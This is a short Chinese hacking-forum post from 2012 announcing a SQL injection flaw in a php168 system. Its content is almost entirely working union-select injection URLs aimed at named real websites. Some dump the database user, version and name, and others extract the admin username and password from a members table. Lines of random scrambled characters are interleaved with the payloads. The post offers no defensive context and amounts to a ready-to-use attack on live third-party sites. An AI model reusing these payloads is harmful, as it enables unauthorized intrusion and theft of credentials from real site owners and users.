找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3108|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--* s  z* U! P' V4 u
                                                         
" d3 L3 J6 A# f2 S0 l9 S                                       ) o$ D5 |8 ^- p
: i4 \: \. L2 l) P
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--% X! f: q" y1 B) _7 F$ \9 P
                                                     
& d7 L' {3 ?) V2 I2 F2 W3 N                                                                   $ @) K) U' l  E6 D
                                                        ) e6 Q0 B! O; Q
http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
1 x3 Z) @5 X0 N" Z$ |0 G" w9 S; q$ `- V% C2 C. P
8 d% y) j) V2 u! K- ~! L8 K8 W+ \

! R% U3 \3 {$ r( ^" a5 Z9 I8 y( e  c                                                            
  s9 F  ^7 Y4 a5 \7 P9 @ 4 V  X' J4 }4 W
http://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
( e  |# g) ^9 g  {- Z/ s
" K5 ?2 \) E( o4 A9 r0 J" A7 u6 Y5 q; f! E2 _" [! _
$ K6 X% |3 z/ I/ P
                                                                    
! `6 p6 J# q0 G! u% F7 z" U

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表